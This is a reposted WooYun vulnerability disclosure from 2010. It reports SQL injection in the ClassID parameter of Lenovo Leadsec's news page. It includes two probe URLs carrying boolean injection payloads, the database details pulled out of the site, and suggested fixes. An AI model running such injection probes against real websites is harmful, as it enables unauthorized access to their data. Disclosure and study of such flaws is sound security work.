联想网御官网SQL注入漏洞
						
						
																											漏洞概要
缺陷编号:        
WooYun-2010-00328
漏洞标题:        联想网御官网SQL注入漏洞
相关厂商:        
联想网御
漏洞作者:        
路人甲
提交时间:        2010-08-27 11:21
公开时间:        2010-08-27 16:22
漏洞类型:        SQL注射漏洞
危害等级:        中
自评Rank:        10
漏洞状态:        未联系到厂商或者厂商积极忽略
漏洞来源:        
http://www.wooyun.org
Tags标签:       
.net 字符类型注射 sqlserver
漏洞详情披露状态:
2010-08-27:        积极联系厂商并且等待厂商认领中,细节不对外公开
2010-08-27:        厂商已经主动忽略漏洞,细节向公众公开
简要描述:
http://www.leadsec.com.cn/News/Detail.aspx页面中ClassID过滤不充分。
详细说明:
页面存在sql注入。
漏洞证明:
http://www.leadsec.com.cn/News/Detail.aspx?RootID=150&Aid=1858&ClassID=153'and 1=1--
http://www.leadsec.com.cn/News/Detail.aspx?RootID=150&Aid=1858&ClassID=153'and 1=2--
数据库版本:Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2
数据库名:LenovoDomain_DB
连接用户:Lenovo_f
权限:Public
修复方案:
1、对输入参数ClassID过滤。
2、使用web应用防火墙。
版权声明:转载请注明来源 
路人甲@
乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:6 (WooYun评价)
原文:http://www.wooyun.org/bugs/wooyun-2010-0328 
							
															搜索更多相关主题的帖子:
								联想网御 网站漏洞 SQL注入